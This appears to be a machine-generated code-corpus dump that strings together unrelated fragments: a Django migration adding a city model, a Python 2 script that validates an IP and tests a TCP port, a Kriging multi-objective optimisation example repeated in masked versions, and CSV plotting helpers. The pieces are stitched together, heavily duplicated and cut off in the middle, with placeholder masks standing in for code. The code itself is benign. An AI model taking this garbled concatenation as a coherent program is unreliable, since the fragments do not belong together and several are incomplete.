"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [('sepomex', '0006_auto_20151113_2154')]\n operations = [migrations.CreateModel(name='MXCiudad', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('nombre', models.CharField(max_length=\n 200)), ('mx_estado', models.ForeignKey(on_delete=django.db.models.\n deletion.CASCADE, related_name='ciudades', to='sepomex.MXEstado'))]\n ), migrations.AddField(model_name='mxasentamiento', name=\n 'mx_ciudad', field=models.ForeignKey(default='', on_delete=django.\n db.models.deletion.CASCADE, related_name='ciudad', to=\n 'sepomex.MXCiudad'), preserve_default=False)]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.2 on 2017-06-23 17:10\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('sepomex', '0006_auto_20151113_2154'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='MXCiudad',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('nombre', models.CharField(max_length=200)),\n ('mx_estado', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ciudades', to='sepomex.MXEstado')),\n ],\n ),\n migrations.AddField(\n model_name='mxasentamiento',\n name='mx_ciudad',\n field=models.ForeignKey(default='', on_delete=django.db.models.deletion.CASCADE, related_name='ciudad', to='sepomex.MXCiudad'),\n preserve_default=False,\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
'''
Created on Sep 4, 2014
@author: Jay <smile665@gmail.com>
'''
import socket
def ip_validation(ip):
'''
check if the ip address is in a valid format.
'''
try:
socket.inet_aton(ip)
return True
except socket.error:
return False
def connection_validation(ip, port):
'''
check if the ip:port can be connected using socket.
@param port: the port is an integer.
'''
if not ip_validation(ip):
return False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
result = sock.connect_ex((ip, port))
if result == 0:
return True
else:
return False
if __name__ == '__main__':
ip = '192.168.213.11'
port = 90
print ip_validation(ip)
print connection_validation(ip, port)
|
normal
|
{
"blob_id": "2bc9c0711831d9ed9009d0f9600153709bbcd6da",
"index": 9178,
"step-1": "'''\nCreated on Sep 4, 2014\n\n@author: Jay <smile665@gmail.com>\n'''\n\nimport socket\n\n\ndef ip_validation(ip):\n '''\n check if the ip address is in a valid format.\n '''\n try:\n socket.inet_aton(ip)\n return True\n except socket.error:\n return False\n\n\ndef connection_validation(ip, port):\n '''\n check if the ip:port can be connected using socket.\n @param port: the port is an integer.\n '''\n if not ip_validation(ip):\n return False\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(2)\n result = sock.connect_ex((ip, port))\n if result == 0:\n return True\n else:\n return False\n\n\nif __name__ == '__main__':\n ip = '192.168.213.11'\n port = 90\n print ip_validation(ip)\n print connection_validation(ip, port)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
def generate_kriging():
nsample = 20
nvar = 2
nobj = 2
lb = -1 * np.ones(shape=[nvar])
ub = 1 * np.ones(shape=[nvar])
sampoption = 'halton'
samplenorm, sample = sampling(sampoption, nvar, nsample, result='real',
upbound=ub, lobound=lb)
X = sample
global y
y = evaluate(X, 'schaffer')
KrigInfo1 = initkriginfo()
KrigInfo1['X'] = X
KrigInfo1['y'] = y[:, 0].reshape(-1, 1)
KrigInfo1['problem'] = 'schaffer'
KrigInfo1['nrestart'] = 5
KrigInfo1['ub'] = ub
KrigInfo1['lb'] = lb
KrigInfo1['optimizer'] = 'lbfgsb'
KrigInfo2 = deepcopy(KrigInfo1)
KrigInfo2['y'] = y[:, 1].reshape(-1, 1)
krigobj1 = Kriging(KrigInfo1, standardization=True, standtype='default',
normy=False, trainvar=False)
krigobj1.train(n_cpu=n_cpu)
loocverr1, _ = krigobj1.loocvcalc()
print('LOOCV error of Kriging model: ', loocverr1, '%')
krigobj2 = Kriging(KrigInfo2, standardization=True, standtype='default',
normy=False, trainvar=False)
krigobj2.train(n_cpu=n_cpu)
loocverr2, _ = krigobj2.loocvcalc()
print('LOOCV error of Kriging model: ', loocverr2, '%')
return krigobj1, krigobj2
def runopt(krigobj1, krigobj2):
moboInfo = dict()
moboInfo['nup'] = 3
moboInfo['nrestart'] = 10
moboInfo['acquifunc'] = 'ehvi'
moboInfo['acquifuncopt'] = 'lbfgsb'
Optim = MOBO(moboInfo, [krigobj1, krigobj2], autoupdate=True, multiupdate=5
)
xupdate, yupdate, supdate, metricall = Optim.run(disp=True)
return xupdate, yupdate, metricall
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def generate_kriging():
nsample = 20
nvar = 2
nobj = 2
lb = -1 * np.ones(shape=[nvar])
ub = 1 * np.ones(shape=[nvar])
sampoption = 'halton'
samplenorm, sample = sampling(sampoption, nvar, nsample, result='real',
upbound=ub, lobound=lb)
X = sample
global y
y = evaluate(X, 'schaffer')
KrigInfo1 = initkriginfo()
KrigInfo1['X'] = X
KrigInfo1['y'] = y[:, 0].reshape(-1, 1)
KrigInfo1['problem'] = 'schaffer'
KrigInfo1['nrestart'] = 5
KrigInfo1['ub'] = ub
KrigInfo1['lb'] = lb
KrigInfo1['optimizer'] = 'lbfgsb'
KrigInfo2 = deepcopy(KrigInfo1)
KrigInfo2['y'] = y[:, 1].reshape(-1, 1)
krigobj1 = Kriging(KrigInfo1, standardization=True, standtype='default',
normy=False, trainvar=False)
krigobj1.train(n_cpu=n_cpu)
loocverr1, _ = krigobj1.loocvcalc()
print('LOOCV error of Kriging model: ', loocverr1, '%')
krigobj2 = Kriging(KrigInfo2, standardization=True, standtype='default',
normy=False, trainvar=False)
krigobj2.train(n_cpu=n_cpu)
loocverr2, _ = krigobj2.loocvcalc()
print('LOOCV error of Kriging model: ', loocverr2, '%')
return krigobj1, krigobj2
def runopt(krigobj1, krigobj2):
moboInfo = dict()
moboInfo['nup'] = 3
moboInfo['nrestart'] = 10
moboInfo['acquifunc'] = 'ehvi'
moboInfo['acquifuncopt'] = 'lbfgsb'
Optim = MOBO(moboInfo, [krigobj1, krigobj2], autoupdate=True, multiupdate=5
)
xupdate, yupdate, supdate, metricall = Optim.run(disp=True)
return xupdate, yupdate, metricall
if __name__ == '__main__':
krigobj1, krigobj2 = generate_kriging()
xupdate, yupdate, metricall = runopt(krigobj1, krigobj2)
print(metricall)
plt.scatter(y[:, 0], y[:, 1])
plt.scatter(yupdate[:, 0], yupdate[:, 1])
plt.show()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
os.environ['MKL_NUM_THREADS'] = '1'
os.environ['OPENBLAS_NUM_THREADS'] = '1'
os.environ['MKL_DEBUG_CPU_TYPE'] = '5'
<|reserved_special_token_0|>
def generate_kriging():
nsample = 20
nvar = 2
nobj = 2
lb = -1 * np.ones(shape=[nvar])
ub = 1 * np.ones(shape=[nvar])
sampoption = 'halton'
samplenorm, sample = sampling(sampoption, nvar, nsample, result='real',
upbound=ub, lobound=lb)
X = sample
global y
y = evaluate(X, 'schaffer')
KrigInfo1 = initkriginfo()
KrigInfo1['X'] = X
KrigInfo1['y'] = y[:, 0].reshape(-1, 1)
KrigInfo1['problem'] = 'schaffer'
KrigInfo1['nrestart'] = 5
KrigInfo1['ub'] = ub
KrigInfo1['lb'] = lb
KrigInfo1['optimizer'] = 'lbfgsb'
KrigInfo2 = deepcopy(KrigInfo1)
KrigInfo2['y'] = y[:, 1].reshape(-1, 1)
krigobj1 = Kriging(KrigInfo1, standardization=True, standtype='default',
normy=False, trainvar=False)
krigobj1.train(n_cpu=n_cpu)
loocverr1, _ = krigobj1.loocvcalc()
print('LOOCV error of Kriging model: ', loocverr1, '%')
krigobj2 = Kriging(KrigInfo2, standardization=True, standtype='default',
normy=False, trainvar=False)
krigobj2.train(n_cpu=n_cpu)
loocverr2, _ = krigobj2.loocvcalc()
print('LOOCV error of Kriging model: ', loocverr2, '%')
return krigobj1, krigobj2
def runopt(krigobj1, krigobj2):
moboInfo = dict()
moboInfo['nup'] = 3
moboInfo['nrestart'] = 10
moboInfo['acquifunc'] = 'ehvi'
moboInfo['acquifuncopt'] = 'lbfgsb'
Optim = MOBO(moboInfo, [krigobj1, krigobj2], autoupdate=True, multiupdate=5
)
xupdate, yupdate, supdate, metricall = Optim.run(disp=True)
return xupdate, yupdate, metricall
if __name__ == '__main__':
krigobj1, krigobj2 = generate_kriging()
xupdate, yupdate, metricall = runopt(krigobj1, krigobj2)
print(metricall)
plt.scatter(y[:, 0], y[:, 1])
plt.scatter(yupdate[:, 0], yupdate[:, 1])
plt.show()
<|reserved_special_token_1|>
import os
os.environ['MKL_NUM_THREADS'] = '1'
os.environ['OPENBLAS_NUM_THREADS'] = '1'
os.environ['MKL_DEBUG_CPU_TYPE'] = '5'
import numpy as np
from matplotlib import pyplot as plt
from copy import deepcopy
from kadal.optim_tools.MOBO import MOBO
from kadal.surrogate_models.kriging_model import Kriging
from kadal.surrogate_models.supports.initinfo import initkriginfo
from kadal.testcase.analyticalfcn.cases import evaluate
from kadal.misc.sampling.samplingplan import sampling
def generate_kriging():
nsample = 20
nvar = 2
nobj = 2
lb = -1 * np.ones(shape=[nvar])
ub = 1 * np.ones(shape=[nvar])
sampoption = 'halton'
samplenorm, sample = sampling(sampoption, nvar, nsample, result='real',
upbound=ub, lobound=lb)
X = sample
global y
y = evaluate(X, 'schaffer')
KrigInfo1 = initkriginfo()
KrigInfo1['X'] = X
KrigInfo1['y'] = y[:, 0].reshape(-1, 1)
KrigInfo1['problem'] = 'schaffer'
KrigInfo1['nrestart'] = 5
KrigInfo1['ub'] = ub
KrigInfo1['lb'] = lb
KrigInfo1['optimizer'] = 'lbfgsb'
KrigInfo2 = deepcopy(KrigInfo1)
KrigInfo2['y'] = y[:, 1].reshape(-1, 1)
krigobj1 = Kriging(KrigInfo1, standardization=True, standtype='default',
normy=False, trainvar=False)
krigobj1.train(n_cpu=n_cpu)
loocverr1, _ = krigobj1.loocvcalc()
print('LOOCV error of Kriging model: ', loocverr1, '%')
krigobj2 = Kriging(KrigInfo2, standardization=True, standtype='default',
normy=False, trainvar=False)
krigobj2.train(n_cpu=n_cpu)
loocverr2, _ = krigobj2.loocvcalc()
print('LOOCV error of Kriging model: ', loocverr2, '%')
return krigobj1, krigobj2
def runopt(krigobj1, krigobj2):
moboInfo = dict()
moboInfo['nup'] = 3
moboInfo['nrestart'] = 10
moboInfo['acquifunc'] = 'ehvi'
moboInfo['acquifuncopt'] = 'lbfgsb'
Optim = MOBO(moboInfo, [krigobj1, krigobj2], autoupdate=True, multiupdate=5
)
xupdate, yupdate, supdate, metricall = Optim.run(disp=True)
return xupdate, yupdate, metricall
if __name__ == '__main__':
krigobj1, krigobj2 = generate_kriging()
xupdate, yupdate, metricall = runopt(krigobj1, krigobj2)
print(metricall)
plt.scatter(y[:, 0], y[:, 1])
plt.scatter(yupdate[:, 0], yupdate[:, 1])
plt.show()
<|reserved_special_token_1|>
import os
# Set a single thread per process for numpy with MKL/BLAS
os.environ['MKL_NUM_THREADS'] = '1'
os.environ['OPENBLAS_NUM_THREADS'] = '1'
os.environ['MKL_DEBUG_CPU_TYPE'] = '5'
import numpy as np
from matplotlib import pyplot as plt
from copy import deepcopy
from kadal.optim_tools.MOBO import MOBO
from kadal.surrogate_models.kriging_model import Kriging
from kadal.surrogate_models.supports.initinfo import initkriginfo
from kadal.testcase.analyticalfcn.cases import evaluate
from kadal.misc.sampling.samplingplan import sampling
def generate_kriging():
# Sampling
nsample = 20
nvar = 2
nobj = 2
lb = -1 * np.ones(shape=[nvar])
ub = 1 * np.ones(shape=[nvar])
sampoption = "halton"
samplenorm, sample = sampling(sampoption, nvar, nsample, result="real",
upbound=ub, lobound=lb)
X = sample
# Evaluate sample
global y
y = evaluate(X, "schaffer")
# Initialize KrigInfo
KrigInfo1 = initkriginfo()
# Set KrigInfo
KrigInfo1["X"] = X
KrigInfo1["y"] = y[:, 0].reshape(-1, 1)
KrigInfo1["problem"] = "schaffer"
KrigInfo1["nrestart"] = 5
KrigInfo1["ub"] = ub
KrigInfo1["lb"] = lb
KrigInfo1["optimizer"] = "lbfgsb"
# Initialize KrigInfo
KrigInfo2 = deepcopy(KrigInfo1)
KrigInfo2['y'] = y[:, 1].reshape(-1, 1)
# Run Kriging
krigobj1 = Kriging(KrigInfo1, standardization=True, standtype='default',
normy=False, trainvar=False)
krigobj1.train(n_cpu=n_cpu)
loocverr1, _ = krigobj1.loocvcalc()
print("LOOCV error of Kriging model: ", loocverr1, "%")
krigobj2 = Kriging(KrigInfo2, standardization=True, standtype='default',
normy=False, trainvar=False)
krigobj2.train(n_cpu=n_cpu)
loocverr2, _ = krigobj2.loocvcalc()
print("LOOCV error of Kriging model: ", loocverr2, "%")
return krigobj1, krigobj2
def runopt(krigobj1, krigobj2):
moboInfo = dict()
moboInfo["nup"] = 3
moboInfo["nrestart"] = 10
moboInfo["acquifunc"] = "ehvi"
moboInfo["acquifuncopt"] = "lbfgsb"
Optim = MOBO(moboInfo, [krigobj1, krigobj2], autoupdate=True, multiupdate=5)
xupdate, yupdate, supdate, metricall = Optim.run(disp=True)
return xupdate, yupdate, metricall
if __name__ == '__main__':
krigobj1, krigobj2 = generate_kriging()
xupdate, yupdate, metricall = runopt(krigobj1, krigobj2)
print(metricall)
plt.scatter(y[:, 0], y[:, 1])
plt.scatter(yupdate[:, 0], yupdate[:, 1])
plt.show()
|
flexible
|
{
"blob_id": "ba289bcdc0aa7c2ad70dba7fac541900d0b55387",
"index": 7585,
"step-1": "<mask token>\n\n\ndef generate_kriging():\n nsample = 20\n nvar = 2\n nobj = 2\n lb = -1 * np.ones(shape=[nvar])\n ub = 1 * np.ones(shape=[nvar])\n sampoption = 'halton'\n samplenorm, sample = sampling(sampoption, nvar, nsample, result='real',\n upbound=ub, lobound=lb)\n X = sample\n global y\n y = evaluate(X, 'schaffer')\n KrigInfo1 = initkriginfo()\n KrigInfo1['X'] = X\n KrigInfo1['y'] = y[:, 0].reshape(-1, 1)\n KrigInfo1['problem'] = 'schaffer'\n KrigInfo1['nrestart'] = 5\n KrigInfo1['ub'] = ub\n KrigInfo1['lb'] = lb\n KrigInfo1['optimizer'] = 'lbfgsb'\n KrigInfo2 = deepcopy(KrigInfo1)\n KrigInfo2['y'] = y[:, 1].reshape(-1, 1)\n krigobj1 = Kriging(KrigInfo1, standardization=True, standtype='default',\n normy=False, trainvar=False)\n krigobj1.train(n_cpu=n_cpu)\n loocverr1, _ = krigobj1.loocvcalc()\n print('LOOCV error of Kriging model: ', loocverr1, '%')\n krigobj2 = Kriging(KrigInfo2, standardization=True, standtype='default',\n normy=False, trainvar=False)\n krigobj2.train(n_cpu=n_cpu)\n loocverr2, _ = krigobj2.loocvcalc()\n print('LOOCV error of Kriging model: ', loocverr2, '%')\n return krigobj1, krigobj2\n\n\ndef runopt(krigobj1, krigobj2):\n moboInfo = dict()\n moboInfo['nup'] = 3\n moboInfo['nrestart'] = 10\n moboInfo['acquifunc'] = 'ehvi'\n moboInfo['acquifuncopt'] = 'lbfgsb'\n Optim = MOBO(moboInfo, [krigobj1, krigobj2], autoupdate=True, multiupdate=5\n )\n xupdate, yupdate, supdate, metricall = Optim.run(disp=True)\n return xupdate, yupdate, metricall\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef generate_kriging():\n nsample = 20\n nvar = 2\n nobj = 2\n lb = -1 * np.ones(shape=[nvar])\n ub = 1 * np.ones(shape=[nvar])\n sampoption = 'halton'\n samplenorm, sample = sampling(sampoption, nvar, nsample, result='real',\n upbound=ub, lobound=lb)\n X = sample\n global y\n y = evaluate(X, 'schaffer')\n KrigInfo1 = initkriginfo()\n KrigInfo1['X'] = X\n KrigInfo1['y'] = y[:, 0].reshape(-1, 1)\n KrigInfo1['problem'] = 'schaffer'\n KrigInfo1['nrestart'] = 5\n KrigInfo1['ub'] = ub\n KrigInfo1['lb'] = lb\n KrigInfo1['optimizer'] = 'lbfgsb'\n KrigInfo2 = deepcopy(KrigInfo1)\n KrigInfo2['y'] = y[:, 1].reshape(-1, 1)\n krigobj1 = Kriging(KrigInfo1, standardization=True, standtype='default',\n normy=False, trainvar=False)\n krigobj1.train(n_cpu=n_cpu)\n loocverr1, _ = krigobj1.loocvcalc()\n print('LOOCV error of Kriging model: ', loocverr1, '%')\n krigobj2 = Kriging(KrigInfo2, standardization=True, standtype='default',\n normy=False, trainvar=False)\n krigobj2.train(n_cpu=n_cpu)\n loocverr2, _ = krigobj2.loocvcalc()\n print('LOOCV error of Kriging model: ', loocverr2, '%')\n return krigobj1, krigobj2\n\n\ndef runopt(krigobj1, krigobj2):\n moboInfo = dict()\n moboInfo['nup'] = 3\n moboInfo['nrestart'] = 10\n moboInfo['acquifunc'] = 'ehvi'\n moboInfo['acquifuncopt'] = 'lbfgsb'\n Optim = MOBO(moboInfo, [krigobj1, krigobj2], autoupdate=True, multiupdate=5\n )\n xupdate, yupdate, supdate, metricall = Optim.run(disp=True)\n return xupdate, yupdate, metricall\n\n\nif __name__ == '__main__':\n krigobj1, krigobj2 = generate_kriging()\n xupdate, yupdate, metricall = runopt(krigobj1, krigobj2)\n print(metricall)\n plt.scatter(y[:, 0], y[:, 1])\n plt.scatter(yupdate[:, 0], yupdate[:, 1])\n plt.show()\n",
"step-3": "<mask token>\nos.environ['MKL_NUM_THREADS'] = '1'\nos.environ['OPENBLAS_NUM_THREADS'] = '1'\nos.environ['MKL_DEBUG_CPU_TYPE'] = '5'\n<mask token>\n\n\ndef generate_kriging():\n nsample = 20\n nvar = 2\n nobj = 2\n lb = -1 * np.ones(shape=[nvar])\n ub = 1 * np.ones(shape=[nvar])\n sampoption = 'halton'\n samplenorm, sample = sampling(sampoption, nvar, nsample, result='real',\n upbound=ub, lobound=lb)\n X = sample\n global y\n y = evaluate(X, 'schaffer')\n KrigInfo1 = initkriginfo()\n KrigInfo1['X'] = X\n KrigInfo1['y'] = y[:, 0].reshape(-1, 1)\n KrigInfo1['problem'] = 'schaffer'\n KrigInfo1['nrestart'] = 5\n KrigInfo1['ub'] = ub\n KrigInfo1['lb'] = lb\n KrigInfo1['optimizer'] = 'lbfgsb'\n KrigInfo2 = deepcopy(KrigInfo1)\n KrigInfo2['y'] = y[:, 1].reshape(-1, 1)\n krigobj1 = Kriging(KrigInfo1, standardization=True, standtype='default',\n normy=False, trainvar=False)\n krigobj1.train(n_cpu=n_cpu)\n loocverr1, _ = krigobj1.loocvcalc()\n print('LOOCV error of Kriging model: ', loocverr1, '%')\n krigobj2 = Kriging(KrigInfo2, standardization=True, standtype='default',\n normy=False, trainvar=False)\n krigobj2.train(n_cpu=n_cpu)\n loocverr2, _ = krigobj2.loocvcalc()\n print('LOOCV error of Kriging model: ', loocverr2, '%')\n return krigobj1, krigobj2\n\n\ndef runopt(krigobj1, krigobj2):\n moboInfo = dict()\n moboInfo['nup'] = 3\n moboInfo['nrestart'] = 10\n moboInfo['acquifunc'] = 'ehvi'\n moboInfo['acquifuncopt'] = 'lbfgsb'\n Optim = MOBO(moboInfo, [krigobj1, krigobj2], autoupdate=True, multiupdate=5\n )\n xupdate, yupdate, supdate, metricall = Optim.run(disp=True)\n return xupdate, yupdate, metricall\n\n\nif __name__ == '__main__':\n krigobj1, krigobj2 = generate_kriging()\n xupdate, yupdate, metricall = runopt(krigobj1, krigobj2)\n print(metricall)\n plt.scatter(y[:, 0], y[:, 1])\n plt.scatter(yupdate[:, 0], yupdate[:, 1])\n plt.show()\n",
"step-4": "import os\nos.environ['MKL_NUM_THREADS'] = '1'\nos.environ['OPENBLAS_NUM_THREADS'] = '1'\nos.environ['MKL_DEBUG_CPU_TYPE'] = '5'\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom copy import deepcopy\nfrom kadal.optim_tools.MOBO import MOBO\nfrom kadal.surrogate_models.kriging_model import Kriging\nfrom kadal.surrogate_models.supports.initinfo import initkriginfo\nfrom kadal.testcase.analyticalfcn.cases import evaluate\nfrom kadal.misc.sampling.samplingplan import sampling\n\n\ndef generate_kriging():\n nsample = 20\n nvar = 2\n nobj = 2\n lb = -1 * np.ones(shape=[nvar])\n ub = 1 * np.ones(shape=[nvar])\n sampoption = 'halton'\n samplenorm, sample = sampling(sampoption, nvar, nsample, result='real',\n upbound=ub, lobound=lb)\n X = sample\n global y\n y = evaluate(X, 'schaffer')\n KrigInfo1 = initkriginfo()\n KrigInfo1['X'] = X\n KrigInfo1['y'] = y[:, 0].reshape(-1, 1)\n KrigInfo1['problem'] = 'schaffer'\n KrigInfo1['nrestart'] = 5\n KrigInfo1['ub'] = ub\n KrigInfo1['lb'] = lb\n KrigInfo1['optimizer'] = 'lbfgsb'\n KrigInfo2 = deepcopy(KrigInfo1)\n KrigInfo2['y'] = y[:, 1].reshape(-1, 1)\n krigobj1 = Kriging(KrigInfo1, standardization=True, standtype='default',\n normy=False, trainvar=False)\n krigobj1.train(n_cpu=n_cpu)\n loocverr1, _ = krigobj1.loocvcalc()\n print('LOOCV error of Kriging model: ', loocverr1, '%')\n krigobj2 = Kriging(KrigInfo2, standardization=True, standtype='default',\n normy=False, trainvar=False)\n krigobj2.train(n_cpu=n_cpu)\n loocverr2, _ = krigobj2.loocvcalc()\n print('LOOCV error of Kriging model: ', loocverr2, '%')\n return krigobj1, krigobj2\n\n\ndef runopt(krigobj1, krigobj2):\n moboInfo = dict()\n moboInfo['nup'] = 3\n moboInfo['nrestart'] = 10\n moboInfo['acquifunc'] = 'ehvi'\n moboInfo['acquifuncopt'] = 'lbfgsb'\n Optim = MOBO(moboInfo, [krigobj1, krigobj2], autoupdate=True, multiupdate=5\n )\n xupdate, yupdate, supdate, metricall = Optim.run(disp=True)\n return xupdate, yupdate, metricall\n\n\nif __name__ == '__main__':\n krigobj1, krigobj2 = generate_kriging()\n xupdate, yupdate, metricall = runopt(krigobj1, krigobj2)\n print(metricall)\n plt.scatter(y[:, 0], y[:, 1])\n plt.scatter(yupdate[:, 0], yupdate[:, 1])\n plt.show()\n",
"step-5": "import os\n# Set a single thread per process for numpy with MKL/BLAS\nos.environ['MKL_NUM_THREADS'] = '1'\nos.environ['OPENBLAS_NUM_THREADS'] = '1'\nos.environ['MKL_DEBUG_CPU_TYPE'] = '5'\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom copy import deepcopy\n\nfrom kadal.optim_tools.MOBO import MOBO\nfrom kadal.surrogate_models.kriging_model import Kriging\nfrom kadal.surrogate_models.supports.initinfo import initkriginfo\nfrom kadal.testcase.analyticalfcn.cases import evaluate\nfrom kadal.misc.sampling.samplingplan import sampling\n\n\ndef generate_kriging():\n # Sampling\n nsample = 20\n nvar = 2\n nobj = 2\n lb = -1 * np.ones(shape=[nvar])\n ub = 1 * np.ones(shape=[nvar])\n sampoption = \"halton\"\n samplenorm, sample = sampling(sampoption, nvar, nsample, result=\"real\",\n upbound=ub, lobound=lb)\n X = sample\n # Evaluate sample\n global y\n y = evaluate(X, \"schaffer\")\n\n # Initialize KrigInfo\n KrigInfo1 = initkriginfo()\n # Set KrigInfo\n KrigInfo1[\"X\"] = X\n KrigInfo1[\"y\"] = y[:, 0].reshape(-1, 1)\n KrigInfo1[\"problem\"] = \"schaffer\"\n KrigInfo1[\"nrestart\"] = 5\n KrigInfo1[\"ub\"] = ub\n KrigInfo1[\"lb\"] = lb\n KrigInfo1[\"optimizer\"] = \"lbfgsb\"\n\n # Initialize KrigInfo\n KrigInfo2 = deepcopy(KrigInfo1)\n KrigInfo2['y'] = y[:, 1].reshape(-1, 1)\n\n # Run Kriging\n krigobj1 = Kriging(KrigInfo1, standardization=True, standtype='default',\n normy=False, trainvar=False)\n krigobj1.train(n_cpu=n_cpu)\n loocverr1, _ = krigobj1.loocvcalc()\n print(\"LOOCV error of Kriging model: \", loocverr1, \"%\")\n\n krigobj2 = Kriging(KrigInfo2, standardization=True, standtype='default',\n normy=False, trainvar=False)\n krigobj2.train(n_cpu=n_cpu)\n loocverr2, _ = krigobj2.loocvcalc()\n print(\"LOOCV error of Kriging model: \", loocverr2, \"%\")\n\n return krigobj1, krigobj2\n\n\ndef runopt(krigobj1, krigobj2):\n moboInfo = dict()\n moboInfo[\"nup\"] = 3\n moboInfo[\"nrestart\"] = 10\n moboInfo[\"acquifunc\"] = \"ehvi\"\n moboInfo[\"acquifuncopt\"] = \"lbfgsb\"\n\n Optim = MOBO(moboInfo, [krigobj1, krigobj2], autoupdate=True, multiupdate=5)\n xupdate, yupdate, supdate, metricall = Optim.run(disp=True)\n\n return xupdate, yupdate, metricall\n\n\nif __name__ == '__main__':\n krigobj1, krigobj2 = generate_kriging()\n xupdate, yupdate, metricall = runopt(krigobj1, krigobj2)\n\n print(metricall)\n plt.scatter(y[:, 0], y[:, 1])\n plt.scatter(yupdate[:, 0], yupdate[:, 1])\n plt.show()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def save_cp_csvdata(reward, err, filename):
with open(filename, mode='w') as data_file:
data_writer = csv.writer(data_file, delimiter=',', quotechar='"',
quoting=csv.QUOTE_MINIMAL)
data_writer.writerow(['epoch', 'reward', 'error'])
for i in range(reward.shape[0]):
data_writer.writerow([i, reward[i], err[i]])
def read_cp_csvdata(epoch, filename):
reward = np.zeros(epoch)
err = np.zeros(epoch)
with open(filename) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count == 0:
pass
else:
reward[line_count - 1] = row[1]
err[line_count - 1] = row[2]
line_count += 1
print(f'Processed {line_count} lines.')
return reward, err
def draw_plot(data, error, epoch=100, filename='tests.png'):
fig, ax = plt.subplots()
plt.xlabel('episode')
plt.ylabel('reward')
ax.errorbar(np.array(range(epoch)), data, yerr=error, fmt='o')
plt.savefig(filename, dpi=200)
plt.show()
def draw_multi_bar(x, y_map, filename='result.png'):
labels = list(y_map.keys())
plt.xlabel('episode')
plt.ylabel('reward')
plt.xticks([x.index(0), x.index(49), x.index(99)], [0, 49, 99])
for l in labels:
plt.plot(range(len(x)), y_map[l], linestyle='-', label=l)
plt.legend(loc='lower right')
plt.savefig(filename, dpi=200)
plt.show()
<|reserved_special_token_0|>
def draw_plot3():
grid_map = {}
cp_map = {}
grid_map['sarsa'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]
cp_map['sarsa'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]
grid_map['qlearning'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]
cp_map['qlearning'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]
grid_map['cem'] = read_cp_csvdata(100, 'ce_grid.csv')[0]
cp_map['cem'] = read_cp_csvdata(100, 'ce_cartpole.csv')[0]
draw_multi_bar(range(100), grid_map, filename='grid_comparision.png')
draw_multi_bar(range(100), cp_map, filename='cartpole_comparision.png')
def draw_plot4():
sarsagrid_map = {}
sarsacp_map = {}
qgrid_map = {}
qcp_map = {}
sarsagrid_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv'
)[0]
sarsagrid_map['softmax'] = read_cp_csvdata(100,
'softmax/sarsa_grid_f_1.csv')[0]
sarsacp_map['epsilon greedy'] = read_cp_csvdata(100,
'sarsa_cartpole_f_1.csv')[0]
sarsacp_map['softmax'] = read_cp_csvdata(100,
'softmax/sarsa_cartpole_f_1.csv')[0]
qgrid_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv'
)[0]
qgrid_map['softmax'] = read_cp_csvdata(100,
'softmax/qlearning_grid_f_1.csv')[0]
qcp_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv'
)[0]
qcp_map['softmax'] = read_cp_csvdata(100, 'softmax/q_cartpole_f.csv')[0]
draw_multi_bar(range(100), sarsagrid_map, filename='sarsa_grid_se.png')
draw_multi_bar(range(100), sarsacp_map, filename='sarsa_cp_se.png')
draw_multi_bar(range(100), qgrid_map, filename='q_grid_se.png')
draw_multi_bar(range(100), qcp_map, filename='q_cp_se.png')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def save_cp_csvdata(reward, err, filename):
with open(filename, mode='w') as data_file:
data_writer = csv.writer(data_file, delimiter=',', quotechar='"',
quoting=csv.QUOTE_MINIMAL)
data_writer.writerow(['epoch', 'reward', 'error'])
for i in range(reward.shape[0]):
data_writer.writerow([i, reward[i], err[i]])
def read_cp_csvdata(epoch, filename):
reward = np.zeros(epoch)
err = np.zeros(epoch)
with open(filename) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count == 0:
pass
else:
reward[line_count - 1] = row[1]
err[line_count - 1] = row[2]
line_count += 1
print(f'Processed {line_count} lines.')
return reward, err
def draw_plot(data, error, epoch=100, filename='tests.png'):
fig, ax = plt.subplots()
plt.xlabel('episode')
plt.ylabel('reward')
ax.errorbar(np.array(range(epoch)), data, yerr=error, fmt='o')
plt.savefig(filename, dpi=200)
plt.show()
def draw_multi_bar(x, y_map, filename='result.png'):
labels = list(y_map.keys())
plt.xlabel('episode')
plt.ylabel('reward')
plt.xticks([x.index(0), x.index(49), x.index(99)], [0, 49, 99])
for l in labels:
plt.plot(range(len(x)), y_map[l], linestyle='-', label=l)
plt.legend(loc='lower right')
plt.savefig(filename, dpi=200)
plt.show()
